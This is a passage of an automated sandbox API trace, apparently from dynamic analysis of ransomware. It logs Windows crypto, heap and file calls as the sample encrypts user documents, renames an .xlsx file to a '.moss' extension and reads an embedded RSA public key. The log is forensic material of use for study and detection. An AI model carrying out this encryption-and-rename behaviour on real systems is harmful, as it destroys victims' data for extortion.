dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0169.719] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11) returned 0x35e06d0 [0169.720] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0169.720] GetLastError () returned 0x0 [0169.720] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0169.720] CryptReleaseContext (hProv=0xd2f030, dwFlags=0x0) returned 1 [0169.720] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0169.720] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0169.720] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0169.720] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0169.720] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0169.720] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0169.720] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0169.720] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10030) returned 0x3b62d40 [0169.720] SetFilePointer (in: hFile=0x664, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0169.720] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b88 | out: hHeap=0xcd0000) returned 1 [0169.720] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f0) returned 0x3b39e58 [0169.720] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0169.720] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f0) returned 0x3b447b0 [0169.720] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x58) returned 0x3613610 [0169.720] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b45980 [0169.720] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbf90 [0169.721] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b459c8 [0169.721] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbfa8 [0169.721] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbfd8 [0169.721] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbc90 [0169.721] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbff0 [0169.721] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x24) returned 0x35f9e20 [0169.721] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x158) returned 0x3b51ec0 [0169.721] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0169.721] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b72d78 [0169.721] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbfd8 | out: hHeap=0xcd0000) returned 1 [0169.721] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbff0 | out: hHeap=0xcd0000) returned 1 [0169.721] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbc90 | out: hHeap=0xcd0000) returned 1 [0169.721] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f9e20 | out: hHeap=0xcd0000) returned 1 [0169.721] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b72d78 | out: hHeap=0xcd0000) returned 1 [0169.721] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbc90 [0169.721] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd290 [0169.721] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fbff0 [0169.721] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x18) returned 0x35e0a70 [0169.721] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x9) returned 0x35fbfd8 [0169.721] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd2c0 [0169.721] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10e) returned 0xd57fe0 [0169.721] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c6d8 [0169.721] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x58) returned 0x36136d0 [0169.721] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e06d0 [0169.721] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x104) returned 0x3aa2470 [0169.721] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e0a50 [0169.721] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2a0 [0169.721] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd57fe0 | out: hHeap=0xcd0000) returned 1 [0169.721] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbff0 | out: hHeap=0xcd0000) returned 1 [0169.721] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2c0 | out: hHeap=0xcd0000) returned 1 [0169.721] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbfd8 | out: hHeap=0xcd0000) returned 1 [0169.721] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a70 | out: hHeap=0xcd0000) returned 1 [0169.721] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd290 | out: hHeap=0xcd0000) returned 1 [0169.721] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbc90 | out: hHeap=0xcd0000) returned 1 [0169.721] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0169.721] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3613610 | out: hHeap=0xcd0000) returned 1 [0169.721] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b5ed58 | out: hHeap=0xcd0000) returned 1 [0169.721] GetCurrentThreadId () returned 0x324 [0169.721] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0xd57fe0 [0169.722] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x82) returned 0xd32ab0 [0169.722] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x2c) returned 0x3608a70 [0169.722] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2f030 [0169.722] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x148) returned 0x35ceae8 [0169.722] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd290 [0169.722] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2c0 [0169.722] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0x35deb08 [0169.722] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0169.722] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0169.722] GetCurrentThreadId () returned 0x324 [0169.722] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0169.722] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0169.722] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xeb) returned 0xd23a00 [0169.722] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0169.722] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0169.722] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0169.722] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0169.722] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd23a00 | out: hHeap=0xcd0000) returned 1 [0169.722] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0xd23a00 [0169.722] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd290 | out: hHeap=0xcd0000) returned 1 [0169.722] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4c) returned 0x362c768 [0169.722] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd290 [0169.722] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0x35f7c30 [0169.722] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd320 [0169.722] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbc90 [0169.722] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd320 | out: hHeap=0xcd0000) returned 1 [0169.722] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd320 [0169.722] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2e0 [0169.722] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2f0 [0169.722] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd300 [0169.722] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd310 [0169.722] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd330 [0169.722] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd280 [0169.722] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbfd8 [0169.722] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2e0 | out: hHeap=0xcd0000) returned 1 [0169.722] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd2e0 [0169.722] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd320 | out: hHeap=0xcd0000) returned 1 [0169.723] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd320 [0169.723] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd340 [0169.723] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd350 [0169.723] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd360 [0169.723] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fbff0 [0169.723] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd350 | out: hHeap=0xcd0000) returned 1 [0169.723] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x18) returned 0x35e0a70 [0169.723] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd340 | out: hHeap=0xcd0000) returned 1 [0169.723] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbfc0 [0169.723] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd360 | out: hHeap=0xcd0000) returned 1 [0169.723] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fbbe8 [0169.723] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd320 | out: hHeap=0xcd0000) returned 1 [0169.723] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd320 [0169.723] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd330 | out: hHeap=0xcd0000) returned 1 [0169.723] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbb70 [0169.723] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd320 | out: hHeap=0xcd0000) returned 1 [0169.723] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbc00 [0169.723] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2f0 | out: hHeap=0xcd0000) returned 1 [0169.723] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fc008 [0169.723] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbb70 | out: hHeap=0xcd0000) returned 1 [0169.723] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fbb70 [0169.723] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbc00 | out: hHeap=0xcd0000) returned 1 [0169.723] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd2f0 [0169.723] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd290 | out: hHeap=0xcd0000) returned 1 [0169.723] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e0a10 [0169.723] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2f0 | out: hHeap=0xcd0000) returned 1 [0169.723] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1c) returned 0x3b3c6d8 [0169.723] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbfd8 | out: hHeap=0xcd0000) returned 1 [0169.723] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fbfd8 [0169.723] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2e0 | out: hHeap=0xcd0000) returned 1 [0169.723] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x204) returned 0x3b449a8 [0169.723] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbc90 | out: hHeap=0xcd0000) returned 1 [0169.723] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x108) returned 0x3aa26a0 [0169.723] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbb70 | out: hHeap=0xcd0000) returned 1 [0169.723] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x210) returned 0x3b44bb8 [0169.723] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0169.723] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10c) returned 0xdc53e8 [0169.723] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd300 | out: hHeap=0xcd0000) returned 1 [0169.723] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x108) returned 0x3aa2588 [0169.723] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbfd8 | out: hHeap=0xcd0000) returned 1 [0169.724] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x200) returned 0x3b72d78 [0169.724] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3aa26a0 | out: hHeap=0xcd0000) returned 1 [0169.724] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0xd3e658 [0169.724] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2c0 | out: hHeap=0xcd0000) returned 1 [0169.724] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2f030 | out: hHeap=0xcd0000) returned 1 [0169.724] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd23a00 | out: hHeap=0xcd0000) returned 1 [0169.724] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd3e658 | out: hHeap=0xcd0000) returned 1 [0169.724] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a10 | out: hHeap=0xcd0000) returned 1 [0169.724] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3aa2588 | out: hHeap=0xcd0000) returned 1 [0169.724] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44bb8 | out: hHeap=0xcd0000) returned 1 [0169.724] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b72d78 | out: hHeap=0xcd0000) returned 1 [0169.724] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc53e8 | out: hHeap=0xcd0000) returned 1 [0169.724] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd310 | out: hHeap=0xcd0000) returned 1 [0169.724] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fc008 | out: hHeap=0xcd0000) returned 1 [0169.724] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd280 | out: hHeap=0xcd0000) returned 1 [0169.724] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbbe8 | out: hHeap=0xcd0000) returned 1 [0169.724] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a70 | out: hHeap=0xcd0000) returned 1 [0169.724] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbff0 | out: hHeap=0xcd0000) returned 1 [0169.724] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbfc0 | out: hHeap=0xcd0000) returned 1 [0169.724] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35ceae8 | out: hHeap=0xcd0000) returned 1 [0169.724] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a70 | out: hHeap=0xcd0000) returned 1 [0169.724] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35deb08 | out: hHeap=0xcd0000) returned 1 [0169.724] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbfa8 | out: hHeap=0xcd0000) returned 1 [0169.724] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b459c8 | out: hHeap=0xcd0000) returned 1 [0169.724] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b449a8 | out: hHeap=0xcd0000) returned 1 [0169.724] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f7c30 | out: hHeap=0xcd0000) returned 1 [0169.724] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362c768 | out: hHeap=0xcd0000) returned 1 [0169.724] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3aa2470 | out: hHeap=0xcd0000) returned 1 [0169.724] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e06d0 | out: hHeap=0xcd0000) returned 1 [0169.724] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2a0 | out: hHeap=0xcd0000) returned 1 [0169.724] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a50 | out: hHeap=0xcd0000) returned 1 [0169.724] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x36136d0 | out: hHeap=0xcd0000) returned 1 [0169.725] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b447b0 | out: hHeap=0xcd0000) returned 1 [0169.725] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b88 | out: hHeap=0xcd0000) returned 1 [0169.725] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0169.725] WriteFile (in: hFile=0x664, lpBuffer=0x3b62d40*, nNumberOfBytesToWrite=0x10025, lpNumberOfBytesWritten=0x401fb14, lpOverlapped=0x0 | out: lpBuffer=0x3b62d40*, lpNumberOfBytesWritten=0x401fb14*=0x10025, lpOverlapped=0x0) returned 1 [0169.725] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b62d40 | out: hHeap=0xcd0000) returned 1 [0169.725] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x1002a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.725] WriteFile (in: hFile=0x664, lpBuffer=0xd57fe0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0xd57fe0*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0169.725] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd57fe0 | out: hHeap=0xcd0000) returned 1 [0169.725] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0169.725] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x428) returned 0x3b447b0 [0169.725] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW", cchWideChar=-1, lpMultiByteStr=0x3b447b0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW", lpUsedDefaultChar=0x0) returned 41 [0169.725] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x430) returned 0x3b48820 [0169.725] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b447b0 | out: hHeap=0xcd0000) returned 1 [0169.725] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0169.725] WriteFile (in: hFile=0x664, lpBuffer=0x3b48820*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x3b48820*, lpNumberOfBytesWritten=0x401fb50*=0x28, lpOverlapped=0x0) returned 1 [0169.725] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0169.725] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0169.725] WriteFile (in: hFile=0x664, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x401fb50*=0x26, lpOverlapped=0x0) returned 1 [0169.726] CloseHandle (hObject=0x664) returned 1 [0169.727] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2f030 [0169.727] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x890) returned 0x3b48820 [0169.727] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2f030 | out: hHeap=0xcd0000) returned 1 [0169.727] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\gG42X1snm-IOrhlP.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\gg42x1snm-iorhlp.xlsx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\gG42X1snm-IOrhlP.xlsx.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\gg42x1snm-iorhlp.xlsx.moss")) returned 1 [0169.728] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0169.728] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0169.728] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0169.730] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd80bd8 | out: hHeap=0xcd0000) returned 1 [0169.730] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x739ee340, ftCreationTime.dwHighDateTime=0x1d5dda6, ftLastAccessTime.dwLowDateTime=0xf173ea00, ftLastAccessTime.dwHighDateTime=0x1d5e31d, ftLastWriteTime.dwLowDateTime=0xf173ea00, ftLastWriteTime.dwHighDateTime=0x1d5e31d, nFileSizeHigh=0x0, nFileSizeLow=0x6114, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Kb5b.csv", cAlternateFileName="")) returned 1 [0169.730] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0169.730] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8e) returned 0xd80bd8 [0169.730] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0169.730] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Kb5b.csv") returned=".csv" [0169.730] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Kb5b.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kb5b.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0169.730] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=24852) returned 1 [0169.730] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0169.733] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x60ee, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.733] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0169.734] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0169.734] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0169.734] SetFilePointer (in: hFile=0x664, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0169.734] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x6114, lpOverlapped=0x0) returned 1 [0169.734] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.734] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f3) returned 0x3b39e58 